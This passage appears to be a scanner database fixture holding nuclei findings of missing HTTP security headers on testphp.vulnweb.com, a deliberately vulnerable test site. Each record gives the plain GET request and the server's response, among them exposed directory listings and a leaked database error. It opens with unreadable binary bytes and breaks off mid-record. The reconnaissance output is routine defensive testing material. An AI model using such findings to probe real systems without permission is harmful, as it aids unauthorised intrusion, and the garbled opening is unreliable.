�;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 747, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:54.033Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 748, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:54.214Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 749, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:54.374Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 750, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:54.533Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 751, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:54.698Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 752, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:54.863Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 753, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:55.026Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 754, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:41:55.199Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 755, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:55.362Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 756, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:55.558Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 757, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:55.715Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 758, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:55.869Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 759, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:56.038Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a 